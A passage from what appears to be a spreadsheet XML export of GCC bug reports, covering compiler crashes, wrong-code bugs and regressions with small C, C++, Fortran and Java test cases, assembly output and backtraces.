GNU C++ version 3.2.2 (i386-slackware-linux)
        compiled by GNU C version 3.2.2.
genhvmmain.cpp: In member function `bool Hush::HushVM::run(long int)':
genhvmmain.cpp:362: Internal compiler error in convert_regs_1 at reg-stack.c:
   2765
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.2.2
Environment:
standard Slackware 9.0 (2.4.20) on Intel Celeron
How-To-Repeat:
gcc genhvmmain.ii</t>
  </si>
  <si>
    <t>skavenr</t>
  </si>
  <si>
    <t>GCC-44709</t>
  </si>
  <si>
    <t>BLOCK and GOTO/EXIT/CYCLE</t>
  </si>
  <si>
    <t>I think at least some of the following block-leaving statements are valid probably all. Besides some issues of the type 'rejects valid' there is a big wrong-code question:
The allocatable objects need to be freed and derived types finalized when one leaves the scope of the block. How to handle this? As the example shows there are many jump targets. Maybe one has to do something like
   if (cond)
      savelabel = L.1
      goto clean_up_and_jump
   goto end:
   clean_up_and_jump: 
     cleanup
     goto target
   end:
     cleanup
Or something similar...
Example:
outer: block
  doloop: do i = 1 4
    inner: block
       integer allocatable :: a
       allocate(a)
       a = i
        if(i == 1) cycle       ! (1) - wrong-code: no dealloc
        if(i == 2) exit        ! (2a)- wrong-code: no dealloc
        if(i == 2) exit doloop ! (2b)- rejects-valid: label not found
        if(i == 3) exit inner  ! (3) - PR 44602
        if(i == 4) exit outer  ! (4) - PR 44602
       if(i == 5) goto 111     ! (5) - wrong-code: no dealloc
    end block inner
  end do doloop
end block outer
111 continue
end
(1) and (5) is accepted by gfortran (2) is only accepted without the label (Name 'doloop' in EXIT statement at (1) is not a loop name). (3) and (4) are constructs not yet supported cf. PR 44602.</t>
  </si>
  <si>
    <t>GCC-35729</t>
  </si>
  <si>
    <t>const volatile variable access incorrectly hoisted out of loop</t>
  </si>
  <si>
    <t>This is for gcc version 4.3.0 (GCC) 
func_1() here should never load from g_361 since the loop body never executes:
  const volatile int g_361 = 3L
  volatile int g_2 = 0L
  void func_1 (void) {
    for (g_2 = 0 g_2 &gt; 10 g_2++)
      {
        int l_357 = g_361
      }
  }
However when compiled with gcc -Os -S foo.c we get the following output which does load from g_361:
	.file	foo.c
	.text
.globl func_1
	.type	func_1 @function
func_1:
	pushl	%ebp
	movl	%esp %ebp
	movl	$0 g_2
	movl	g_361 %eax
	jmp	.L2
.L3:
	movl	g_2 %eax
	incl	%eax
	movl	%eax g_2
.L2:
	movl	g_2 %eax
	cmpl	$10 %eax
	jg	.L3
	popl	%ebp
	ret
	.size	func_1 .-func_1
.globl g_361
	.data
	.align 4
	.type	g_361 @object
	.size	g_361 4
g_361:
	.long	3
.globl g_2
	.bss
	.align 4
	.type	g_2 @object
	.size	g_2 4
g_2:
	.zero	4
	.ident	GCC: (GNU) 4.3.0
	.section	.note.GNU-stack@progbits
At -O0 -O1 and -O2 there is no problem.</t>
  </si>
  <si>
    <t>GCC-63408</t>
  </si>
  <si>
    <t>[4.9/5/6 regression] GCC emits incorrect fixed-&gt;fp conversion instruction on Cortex-M4 target</t>
  </si>
  <si>
    <t>When compiling the following function
float f(float a int b)
{
    return a - (((float)b / 0x7fffffff) * 100)
}
with the following command-line options
arm-none-eabi-gcc -O2 -mthumb -mfpu=fpv4-sp-d16 -mfloat-abi=softfp -mcpu=cortex-m4
I get this code for f:
	fmsr	s14 r1	@ int
	flds	s15 .L2
	vcvt.f32.s32	s14 s14 #31
	fmsr	s13 r0
	vfma.f32	s13 s14 s15
	fmrs	r0 s13
	bx	lr
.L3:
	.align	2
.L2:
	.word	1120403456
The resulting code clearly adds the parenthesized expression to a rather than subtracting it.
Replacing the minus sign with a plus sign results in the same code.</t>
  </si>
  <si>
    <t>itay</t>
  </si>
  <si>
    <t>GCC-20499</t>
  </si>
  <si>
    <t>[4.0/4.1 regression] ICE on duplicate class definition</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE on the 4.0 branch and
mainline:
==================
struct A
{
    struct B {}
}
struct A::B {}
==================
The error message is:
  bug.cc:6: error: redefinition of 'struct A::B'
  bug.cc:3: error: previous definition of 'struct A::B'
  bug.cc:6: internal compiler error: tree check: expected class 'type' have
'exceptional' (error_mark) in cp_parser_class_specifier at cp/parser.c:12407
  Please submit a full bug report [etc.]
(Btw this is the same problem as g++.dg/parse/error16.C.
Why the testsuite doesn't trigger is discussed in
http://gcc.gnu.org/ml/gcc/2005-02/msg00953.html)
The regression was probably caused by Mark's patch for PR c++/20152:
2005-02-22  Mark Mitchell  
	PR c++/20152
	* parser.c (cp_parser_class_head): Check for redefintions here.
	* semantics.c (begin_class_definition): Not here.
A patch will follow soon.</t>
  </si>
  <si>
    <t>GCC-40059</t>
  </si>
  <si>
    <t>uninitialized warning missed when uninitialized class member used as array index</t>
  </si>
  <si>
    <t>Compiling this code with g++-4.4 -O -Wall -g kk.cpp -fdiagnostics-show-option...
==============
struct S
{
int a
}
int main()
{
  S s
  int i
  bool arr[1]
  arr[s.a] =true  /*line 11: missed*/  
  arr[i] = true
/*  if (s.a)
    return 1
*/
  return 0
}
==============
produces
kk.cpp:12: warning: â€˜iâ€™ is used uninitialized in this function [-Wuninitialized]
It realizes 1 bug but not the one at line 11 (arr[s.a] =true)
However if we uncomment the if (s.a) it does detect this usage of uninitialized variable
kk.cpp:8: warning: â€˜s.S::aâ€™ is used uninitialized in this function [-Wuninitialized]
thanks</t>
  </si>
  <si>
    <t>GCC-58035</t>
  </si>
  <si>
    <t>LRA: S/390: Ada bootstrap fail</t>
  </si>
  <si>
    <t>Tested with r201329. Ada bootstraps with LRA disabled. When enabling LRA bootstrap fails with:
xgcc: internal compiler error: Segmentation fault (program gnat1)
0x8000fb75 execute
        /home/andreas/clean/gcc-head/gcc/gcc.c:2824
0x8000fe37 do_spec_1
        /home/andreas/clean/gcc-head/gcc/gcc.c:4616
0x80013145 process_brace_body
        /home/andreas/clean/gcc-head/gcc/gcc.c:5873
0x80013145 handle_braces
        /home/andreas/clean/gcc-head/gcc/gcc.c:5787
0x800110b5 do_spec_1
        /home/andreas/clean/gcc-head/gcc/gcc.c:5270
0x80013145 process_brace_body
        /home/andreas/clean/gcc-head/gcc/gcc.c:5873
0x80013145 handle_braces
        /home/andreas/clean/gcc-head/gcc/gcc.c:5787
0x800110b5 do_spec_1
        /home/andreas/clean/gcc-head/gcc/gcc.c:5270
0x800103fb do_spec_1
        /home/andreas/clean/gcc-head/gcc/gcc.c:5375
0x80013145 process_brace_body
        /home/andreas/clean/gcc-head/gcc/gcc.c:5873
0x80013145 handle_braces
        /home/andreas/clean/gcc-head/gcc/gcc.c:5787
0x800110b5 do_spec_1
        /home/andreas/clean/gcc-head/gcc/gcc.c:5270
0x80013145 process_brace_body
        /home/andreas/clean/gcc-head/gcc/gcc.c:5873
0x80013145 handle_braces
        /home/andreas/clean/gcc-head/gcc/gcc.c:5787
0x800110b5 do_spec_1
        /home/andreas/clean/gcc-head/gcc/gcc.c:5270
0x80012557 do_spec_2
        /home/andreas/clean/gcc-head/gcc/gcc.c:4317
0x80013a3b do_spec(char const*)
        /home/andreas/clean/gcc-head/gcc/gcc.c:4284
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[7]: *** [s-auxdec.o] Error 4</t>
  </si>
  <si>
    <t>GCC-83622</t>
  </si>
  <si>
    <t>[8 Regression] Wrong code with derived type and -fopenmp</t>
  </si>
  <si>
    <t>Created attachment 42981
Reproducer
The attached sample code leads to wrong results when compiled with -fopenmp
but works fine with -fno-openmp.  (Note that there are no OpenMP constructs
in the reproducer).
Output with -fopenmp (wrong):
 i =           1 fnct(i) = 'a '
 i =           2 fnct(i) = 'b '
 i =           3 fnct(i) = 'c '
 i =           4 fnct(i) = 'd '
 fnct = 'a a a a '
 equal = F F F F
 count =           0
Output with -fno-openmp (correct):
 i =           1 fnct(i) = 'a '
 i =           2 fnct(i) = 'b '
 i =           3 fnct(i) = 'c '
 i =           4 fnct(i) = 'd '
 fnct = 'a b c d '
 equal = F T F F
 count =           1</t>
  </si>
  <si>
    <t>GCC-7290</t>
  </si>
  <si>
    <t>Inherited method not found when extending abstract class</t>
  </si>
  <si>
    <t xml:space="preserve">	If there is an interface I with one method f() and AX is an
        abstract class implementing I and AY is marked as extending AX
        (but not marked as implementing I) and AY contains a method
        g() that calls f() the AY.java will not compile.
Release:
3.2 20020710 (experimental)
Environment:
System: Linux churchill 2.4.3-12 #1 Fri Jun 8 15:05:56 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --prefix=/home/user/jmr/app/gcc
How-To-Repeat:
	Create the files:
        I.java:
        public interface I {
            void f()
        }
        AX.java:
        abstract class AX implements I { }
        AY.java:
        abstract class AY extends AX /*implements I*/ {
            void g() {
                f()
            }
        }
        Then gcj -v AY.java fails as follows:
        Reading specs from /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
        Reading specs from /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/../../../libgcj.spec
        rename spec lib to liborig
        Configured with: ./configure --prefix=/home/user/jmr/app/gcc
        Thread model: single
        gcc version 3.2 20020710 (experimental)
         /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/jc1 AY.java -fno-use-divide-subroutine -fuse-boehm-gc -fnon-call-exceptions -fkeep-inline-functions -quiet -dumpbase AY.java -g1 -version -o /tmp/ccUMp3aH.s
        GNU Java version 3.2 20020710 (experimental) (i686-pc-linux-gnu)
                compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.1 2.96-85).
        Class path starts here:
            /home/user/jmr/gcj_test/interface/
            /home/user/jmr/app/gcc/share/java/libgcj-3.2.jar/ (system) (zip)
        AY.java: In class `AY':
        AY.java: In method `AY.g()':
        AY.java:3: error: No method named `f' in scope.
                   f()
                   ^
        1 error
        It works if AY is also marked as implementing I so this is a
        workaround.
        This code compiles with javac.</t>
  </si>
  <si>
    <t>GCC-69308</t>
  </si>
  <si>
    <t>ifcombine joins together floating point expression with side effects</t>
  </si>
  <si>
    <t>Created attachment 37366
test case
With floating point exceptions enabled passing a signaling NaN into the expression ( !isnan(x) &amp;&amp; x &gt; 0.0 ) ends up with the second half evaluating and raising an FPE.  Compiling with the -fsignaling-nans flag does not help and the only way to get past this is to disable this pass with the -fdisable-tree-ifcombine flag.
Should ifcombine look at the -fsignaling-nans flag and disqualify floating point expressions for that case?
The attached test case should print pass for all cases.
With the current GCC the optimized build fails with FPE unless built with ifcombine disabled.</t>
  </si>
  <si>
    <t>mtliang</t>
  </si>
  <si>
    <t>GCC-28215</t>
  </si>
  <si>
    <t>[4.2 regression] Bootstrap failure on arm-eabi</t>
  </si>
  <si>
    <t>The arm-none-eabi compiler gets a segmentation fault while building libstdc++.  A back-trace shows that the fault is in determine_visibility() where we are dereferencing a null pointer.
#0  determine_visibility (decl=0xbca2e280)
    at /home/rearnsha/gnusrc/gcc-cross/trunk/gcc/cp/decl2.c:1753
#1  0x08070697 in start_preparsed_function (decl1=0xbca2e280 attrs=0x0 
    flags=1) at /home/rearnsha/gnusrc/gcc-cross/trunk/gcc/cp/decl.c:10610
#2  0x080fd708 in use_thunk (thunk_fndecl=0xbca2e280 emit_p=1 '\001')
    at /home/rearnsha/gnusrc/gcc-cross/trunk/gcc/cp/method.c:460
#3  0x0810a4e3 in emit_associated_thunks (fn=0xbca2e180)
    at /home/rearnsha/gnusrc/gcc-cross/trunk/gcc/cp/semantics.c:3025
#4  0x0810a5e7 in expand_body (fn=0xbca2e180)
    at /home/rearnsha/gnusrc/gcc-cross/trunk/gcc/cp/semantics.c:3065
#5  0x084441cc in cgraph_expand_function (node=0xbcadd770)
    at /home/rearnsha/gnusrc/gcc-cross/trunk/gcc/cgraphunit.c:1112
#6  0x08444355 in cgraph_expand_all_functions ()
    at /home/rearnsha/gnusrc/gcc-cross/trunk/gcc/cgraphunit.c:1177
#7  0x08444ac6 in cgraph_optimize ()
    at /home/rearnsha/gnusrc/gcc-cross/trunk/gcc/cgraphunit.c:1449
#8  0x080ba20f in cp_finish_file ()
    at /home/rearnsha/gnusrc/gcc-cross/trunk/gcc/cp/decl2.c:3310
#9  0x0815aa31 in c_common_parse_file (set_yydebug=0)
...
The decl argument is:
(gdb) call debug_tree (decl)
 &lt;function_decl 0xbca2e280 _ZTv0_n12_NSt14basic_ofstreamIcSt11char_traitsIcEED1Ev
    type &lt;method_type 0xbca29420
        type 
            sizes-gimplified asm_written public unsigned type_6 SI
            size 
            unit size 
            align 32 symtab -1118697984 alias set 5
            pointer_to_this  reference_to_this &gt;
        SI size  unit size 
        align 32 symtab 0 alias set -1 method basetype  &gt;&gt;
        arg-types 
            chain &gt;&gt;&gt;
    addressable used public static weak in_system_header no-static-chain decl_5 SI file /work/rearnsha/gnu/gcc-eabi/trunk/arm-eabi/libstdc++-v3/include/iosfwd line 92 context  &gt;&gt; initial 
    arguments &lt;parm_decl 0xbd72c478 this
        type  &gt;&gt;
            readonly public unsigned SI size  unit size 
            align 32 symtab -1131518128 alias set -1&gt;
        readonly used unsigned SI file /work/rearnsha/gnu/gcc-eabi/trunk/arm-eabi/libstdc++-v3/include/fstream line 585 size  unit size 
        align 32 context  initial  abstract_origin  arg-type &gt;
    result 
        unsigned ignored SI file /home/rearnsha/gnusrc/gcc-cross/trunk/libstdc++-v3/src/fstream-inst.cc line 50 size  unit size 
        align 32&gt;
    saved-insns 0xbd8b8bfc&gt;</t>
  </si>
  <si>
    <t>GCC-58201</t>
  </si>
  <si>
    <t>[4.9 Regression] Undefined reference to `B::B(void const**)'</t>
  </si>
  <si>
    <t>Testcase:
----ABC.h-----
class A
{
 protected:
  A()
  virtual ~A()
}
class B : virtual public A
{
 public:
  B()
  virtual ~B()
}
class C
{
 private:
  class C2 : public B
   {
   public:
     C2()
     virtual ~C2()
   }
}
----AB.cpp-----
#include ABC.h
A::A() { }
A::~A() { }
B::B() { }
B::~B() { }
----C.cpp------
#include ABC.h    
C::C2::C2(){ }      
C::C2::~C2() { }    
int main ()         
{                   
    return 0       
}                   
---------------
Compiling the usual way:
g++ AB.cpp -c
g++ C.cpp -c
g++ AB.o C.o
C.o: In function `C::C2::C2()':
C.cpp:(.text+0x23): undefined reference to `B::B(void const**)'
C.o: In function `C::C2::C2()':
C.cpp:(.text+0x8d): undefined reference to `B::B(void const**)'
C.o: In function `C::C2::~C2()':
C.cpp:(.text+0x129): undefined reference to `B::~B(void const**)'
C.o: In function `C::C2::~C2()':
C.cpp:(.text+0x1c3): undefined reference to `B::~B(void const**)'
collect2: error: ld returned 1 exit status
We cannot right now build the Android Open Source Tree with the trunk because of that bug. It was introduced with this commit:
Author: hubicka                                      
Date:   Thu Jul 25 17:10:21 2013 +0000                                                             
        * cgraph.c (release_function_body): Break out from ...                                     
        (cgraph_release_function_body): ... this one also release DECL_RESULT                     
        and DECL_ARGUMENTS.                                                                        
        * ipa-cp.c (get_replacement_map): Add parm_num argument do not set                        
        old_tree in the map.                                                                       
        (create_specialized_node): Update.                                                         
        * lto-cgraph.c (output_node_opt_summary): Do not translate old_tree                        
        into index.                                                                                
        * cgraphclones.c (cgraph_create_virtual_clone): Do not copy DECL_ARGUMENTS                
        DECL_INITIAL and DECL_RESULT.                                                              
        * ipa-prop.c (ipa_populate_param_decls): Look for origin of clones.                        
        * tree-inline.c (initialize_cfun): Initialize DECL_ARGUMENTS and                           
        DECL_RESULT.                                                                               
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@201251 138bc75d-0d04-0410-961f-82ee72b054a4</t>
  </si>
  <si>
    <t>GCC-25336</t>
  </si>
  <si>
    <t>Identical tests: gfortran.dg/g77/20030115-1.f gfortran.dg/g77/pr9258.f</t>
  </si>
  <si>
    <t>Perhaps remove one?</t>
  </si>
  <si>
    <t>GCC-11336</t>
  </si>
  <si>
    <t>ICE:  bytecode-to-native compiler cannot find interface methods on abstract implementing classes</t>
  </si>
  <si>
    <t>===== I.java =====
public interface I { void foo() }
===== A.java =====
public abstract class A implements I {}
===== C.java =====
class C { void foo(A a) { a.foo() } }
===== commands =====
$ gcj -C *.java
$ gcj -c C.java &amp;&amp; echo it worked
it worked
$ gcj -c C.class
C.java: In class `C':
C.java: In method `C.foo(A)':
C.java:1: error: class 'A' has no method named 'foo' matching signature '()V'
C.java: In constructor `()':
C.java:0: internal compiler error: tree check: accessed elt 0 of tree_vec with 2 
elts in find_local_variable at java/decl.c:200
===== comments =====
Happens on gcj 3.3 with the difference of the C.java:0: error line:
C.java:0: confused by earlier errors bailing out
This prevents compilation of the binary Cryptix JCE and Sun JSSE .jar files 
because they can't find java.security.cert.X509Certificate.
getCriticalExtensionOIDs() (which is actually defined in java.security.cert.
X509Extension implemented by X509Certificate).
Note that compiling from Java source does work (gcj -c C.java above) but JSSE 
is not available in source form.</t>
  </si>
  <si>
    <t>tv</t>
  </si>
  <si>
    <t>GCC-65105</t>
  </si>
  <si>
    <t>[i386] XMM registers are not used for 64bit computations on 32bit target</t>
  </si>
  <si>
    <t>XMM registers may be used for 64bit operations on 32bit target.  It should make code faster and free some GPRs.
Here is an example test where GCC doesn't use XMM registers and possible code with XMM usage:
&gt;cat test.c
long long
test1 (long long x long long y long long z)
{
  return ((x | z ) + (y 
}
&gt;cat test_xmm.s
        .file test.c
        .text
        .globl test1
test1:
        movq      4(%esp) %xmm2
        movq      20(%esp) %xmm1
        movq      12(%esp) %xmm0
        por       %xmm1 %xmm2
        pand      %xmm1 %xmm0
        paddq     %xmm0 %xmm2
        psubq     %xmm1 %xmm2
        movd      %xmm2 %eax
        psrlq     $32 %xmm2
        movd      %xmm2 %edx
        ret</t>
  </si>
  <si>
    <t>GCC-41947</t>
  </si>
  <si>
    <t>GCC Hexadecimal Floating point constant handling</t>
  </si>
  <si>
    <t>GCC accepts constructs such as :  float p = 0x.p5
.As per C99 Standards the grammar for hexadecimal floating points is as follows : 
hexadecimal-floating-constant: 
                            hexadecimal-prefix hexadecimal-fractional-constant 
                                      binary-exponent-part floating-suffix(opt) 
                            hexadecimal-prefix hexadecimal-digit-sequence 
                                      binary-exponent-part floating-suffix(opt) 
hexadecimal-prefix: one of 
                           0x 0X 
hexadecimal-fractional-constant: 
                   hexadecimal-digit-sequence(opt) . hexadecimal-digit-sequence 
                   hexadecimal-digit-sequence . 
binary-exponent-part: 
                   p sign(opt) digit-sequence 
                   P sign(opt) digit-sequence 
hexadecimal-digit-sequence: 
                   hexadecimal-digit 
                   hexadecimal-digit-sequence hexadecimal-digit 
floating-suffix: one of 
                     f l F L 
As per the grammar to my understanding the above construct is invalid.
Command : $ gcc -v -save-temps hexfloat.c
Output : 
Using built-in specs.
Target: i386-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-libgcj-multifile --enable-languages=cc++objcobj-c++javafortranada --enable-java-awt=gtk --disable-dssi --enable-plugin --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-1.4.2.0/jre --with-cpu=generic --host=i386-redhat-linux
Thread model: posix
gcc version 4.1.2 20070626 (Red Hat 4.1.2-14)
 /usr/libexec/gcc/i386-redhat-linux/4.1.2/cc1 -E -quiet -v hexfloat.c -mtune=generic -fpch-preprocess -o hexfloat.i
ignoring nonexistent directory /usr/lib/gcc/i386-redhat-linux/4.1.2/../../../../i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/lib/gcc/i386-redhat-linux/4.1.2/include
 /usr/include
End of search list.
 /usr/libexec/gcc/i386-redhat-linux/4.1.2/cc1 -fpreprocessed hexfloat.i -quiet -dumpbase hexfloat.c -mtune=generic -auxbase hexfloat -version -o hexfloat.s
GNU C version 4.1.2 20070626 (Red Hat 4.1.2-14) (i386-redhat-linux)
        compiled by GNU C version 4.1.2 20070626 (Red Hat 4.1.2-14).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 6f8a93af44427a05901e7b3a98a7b357
 as -V -Qy -o hexfloat.o hexfloat.s
GNU assembler version 2.17.50.0.6-5.el5 (i386-redhat-linux) using BFD version 2.17.50.0.6-5.el5 20061020
 /usr/libexec/gcc/i386-redhat-linux/4.1.2/collect2 --eh-frame-hdr -m elf_i386 --hash-style=gnu -dynamic-linker /lib/ld-linux.so.2 /usr/lib/gcc/i386-redhat-linux/4.1.2/../../../crt1.o /usr/lib/gcc/i386-redhat-linux/4.1.2/../../../crti.o /usr/lib/gcc/i386-redhat-linux/4.1.2/crtbegin.o -L/usr/lib/gcc/i386-redhat-linux/4.1.2 -L/usr/lib/gcc/i386-redhat-linux/4.1.2 -L/usr/lib/gcc/i386-redhat-linux/4.1.2/../../.. hexfloat.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/i386-redhat-linux/4.1.2/crtend.o /usr/lib/gcc/i386-redhat-linux/4.1.2/../../../crtn.o
Preprocessed file : hexfloat.i
# 1 hexfloat.c
# 1 
# 1 
# 1 hexfloat.c
int main(void)
{
 float p = 0x.p5
 return 0
}</t>
  </si>
  <si>
    <t>ameya.malondkar</t>
  </si>
  <si>
    <t>GCC-50919</t>
  </si>
  <si>
    <t>[OOP] Don't use vtable for NON_OVERRIDABLE TBP</t>
  </si>
  <si>
    <t>Current gfortran uses always a vtable for type-bound procedures. However a vtable only makes sense if the type-bound procedure can be overridden (C++: if it is virtual).
Expected:
a) gfortran call the procedure directly which allows for inlining and avoids the pointer dereference.
b) When the ABI is changed the procedure is no longer added to the vtable.
Hence it should be added as item to http://gcc.gnu.org/wiki/LibgfortranAbiCleanup
Test case. The dump shows the following rather than a simple test ():
callit (struct __class_m_T &amp; restrict x)
{
  x-&gt;_vptr-&gt;test ()
module m
type t
contains
  procedure nopass NON_OVERRIDABLE :: test
end type t
contains
  subroutine test()
    print * t's test
  end subroutine test
  subroutine callit(x)
    class(t) :: x
    call x%test()
  end subroutine
end module m
tob@archimedes:/dev/shm&gt; less poly.f90.*
tob@archimedes:/dev/shm&gt; cat poly.f90
module m
type t
contains
  procedure nopass NON_OVERRIDABLE :: test
end type t
contains
  subroutine test()
    print * t's test
  end subroutine test
  subroutine callit(x)
    class(t) :: x
    call x%test()
  end subroutine
end module m</t>
  </si>
  <si>
    <t>GCC-57366</t>
  </si>
  <si>
    <t>gcc.dg/lto/attr-weakref-1 FAILs</t>
  </si>
  <si>
    <t>The new gcc.dg/lto/attr-weakref-1 testcase FAILs in two different but probably
related ways:
On Solaris with Sun as as well as on Linux/x64 configured without weakref support
(gcc_cv_as_weakref=no when configuring/building) I get
FAIL: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o link -O0 -flto -flto-partition=none 
UNRESOLVED: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o execute -O0 -flto -flto-partition=none 
FAIL: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o link -O2 -flto -flto-partition=none 
UNRESOLVED: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o execute -O2 -flto -flto-partition=none 
FAIL: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o link -O0 -flto -flto-partition=1to1  (internal compiler error)
UNRESOLVED: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o execute -O0 -flto -flto-partition=1to1 
FAIL: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o link -O2 -flto -flto-partition=1to1 
UNRESOLVED: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o execute -O2 -flto -flto-partition=1to1 
FAIL: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o link -O0 -flto 
UNRESOLVED: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o execute -O0 -flto 
FAIL: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o link -O2 -flto
UNRESOLVED: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o execute -O2 -flto
For the first failure I see
output is:
Undefined                       first referenced^M
 symbol                             in file^M
callmealias.lto_priv.1              /var/tmp//cc0paO3g.lto.o^M
callmealias.lto_priv.2              /var/tmp//cc0paO3g.lto.o^M
ld: fatal: symbol referencing errors. No output written to gcc-dg-lto-attr-weakref-1-01.exe^M
collect2: error: ld returned 1 exit status^M
in gcc.log.  This is probably related to broken LTO support for non-weakref
toolchains cf. PR lto/47333 which is still unfixed despite being a 4.8/4.9 regression.
Again on both Solaris and Linux/x64 with gas/gld 2.23.1 I get
FAIL: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o link -O2 -flto -flto-partition=none -fuse-linker-plugin -fno-fat-lto-objects 
UNRESOLVED: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o execute -O2 -flto -flto-partition=none -fuse-linker-plugin -fno-fat-lto-objects 
WARNING: program timed out.
FAIL: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o link -O0 -flto -fuse-linker-plugin -fno-fat-lto-objects 
UNRESOLVED: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o execute -O0 -flto -fuse-linker-plugin -fno-fat-lto-objects 
FAIL: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o link -O2 -flto -fuse-linker-plugin
UNRESOLVED: gcc.dg/lto/attr-weakref-1 c_lto_attr-weakref-1_0.o-c_lto_attr-weakref-1_2.o execute -O2 -flto -fuse-linker-plugin
For the first failure I have
output is:
`callmefirst' referenced in section `.text.startup' of /var/tmp//cc6Aaqoc.lto.o: defined in discarded section `.text' of c_lto_attr-weakref-1_0.o (symbol from plugin)^M
`callmesecond' referenced in section `.text.startup' of /var/tmp//cc6Aaqoc.lto.o: defined in discarded section `.text' of c_lto_attr-weakref-1_0.o (symbol from plugin)^M
collect2: error: ld returned 1 exit status^M
  Rainer</t>
  </si>
  <si>
    <t>GCC-38225</t>
  </si>
  <si>
    <t>[4.4 regression] RESHAPE bounds with multi-dimensional SOURCE</t>
  </si>
  <si>
    <t>$ cat resh.f90
program main
  integer dimension(22) :: a
  data a /1 2 3 4/
  print *reshape(a(/4/))
end program main
$ gfortran -fbounds-check resh.f90
$ ./a.out
Fortran runtime error: Incorrect size in SOURCE argument to RESHAPE intrinsic: is 2 should be 4</t>
  </si>
  <si>
    <t>GCC-36239</t>
  </si>
  <si>
    <t>ICE: gfc_validate_kind(): Got bad kind</t>
  </si>
  <si>
    <t>James Van Buskirk found the following bug see
http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/1cc4ce4ecec2933d
         integer parameter :: k_k11 = kind(int(Parg1kind=k11))
                                                               1
Internal Error at (1):
gfc_validate_kind(): Got bad kind
 module bugmod
   parameter(ik1 = selected_int_kind(2))
   implicit complex (P)
   contains
      subroutine bug1(P1)
         integer(ik1) parameter :: k11 = ik1
         complex parameter :: carg1 = 0
         parameter(Parg1 = carg1)
         integer parameter :: k_k11 = kind(int(Parg1kind=k11))
      end subroutine bug1
end module bugmod</t>
  </si>
  <si>
    <t>GCC-26107</t>
  </si>
  <si>
    <t>ICE after error message on invalid code</t>
  </si>
  <si>
    <t>Testcase:
   pure function equals(selfstringignore_case) result(same)
         if (end&gt;len(self)) return
   end function
===
I was trying to reduce an ICE and found this one.</t>
  </si>
  <si>
    <t>GCC-10849</t>
  </si>
  <si>
    <t>[3.3 regression] Cannot define an out-of-class specialization of a private nested template class</t>
  </si>
  <si>
    <t>Reported by Ole Laursen here:
http://gcc.gnu.org/ml/gcc/2003-05/msg01686.html
---------------------------------------------
class X
{
private:
    template  struct Y
}
template  
struct X::Y
{}
---------------------------------------------
gccbug5.cpp:4: error: `template struct X::Y' is private
gccbug5.cpp:9: error: within this context
Regression on the 3.3 branch and mainline (3.2.2 and 2.95
worked fine).
Release:
3.3 and 3.4 (CVS 20030503)
Environment:
i686-pc-cygwin
How-To-Repeat:
Compile the above snippet</t>
  </si>
  <si>
    <t>GCC-13773</t>
  </si>
  <si>
    <t>Incorrect diagnosis of restricted function</t>
  </si>
  <si>
    <t>The following code: 
  Integer Function mycount( inarray ) 
    Implicit None 
    Integer Dimension(5) :: inarray 
    Integer Dimension(Sum(inarray)) :: tt 
    mycount = 1 
  End Function mycount 
gives the error 
parabrisas% g95 tt.f90  
 In file tt.f90:6 
    Integer Dimension(Sum(inarray)) :: tt 
                      1 
Error: Intrinsic function 'sum' at (1) is not a restricted function 
By my reading of s7.1.6.2 (and Intel's and Lahey's) this is however a 
restricted expression and should be allowed.</t>
  </si>
  <si>
    <t>tow21</t>
  </si>
  <si>
    <t>GCC-32903</t>
  </si>
  <si>
    <t>[regression] Default initializer and intent(OUT): default initializer not used</t>
  </si>
  <si>
    <t>I found the following program on my disc it might well belong to some PR but I could not find it anywhere in bugzilla.
